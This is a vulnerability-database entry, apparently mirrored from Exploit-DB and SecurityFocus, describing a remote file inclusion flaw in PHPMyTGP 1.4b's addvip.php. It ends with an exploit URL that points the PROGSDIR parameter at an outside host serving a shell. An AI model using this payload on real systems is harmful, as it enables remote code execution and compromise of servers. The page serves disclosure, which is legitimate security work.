PHPMyTGP 1.4 - 'AddVIP.php' Remote File Inclusion

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1056230 漏洞类型
发布时间 2007-04-25 更新时间 2007-04-25
CVE编号 N/A CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/29902
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/23657/info

PHPMyTGP is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied input.

Exploiting this issue may allow an attacker to compromise the application and the underlying system; other attacks are also possible.

This issue affects PHPMyTGP 1.4b; other versions may also be affected. 

http://www.example.com/addvip.php?msetstr["PROGSDIR"]=http://shell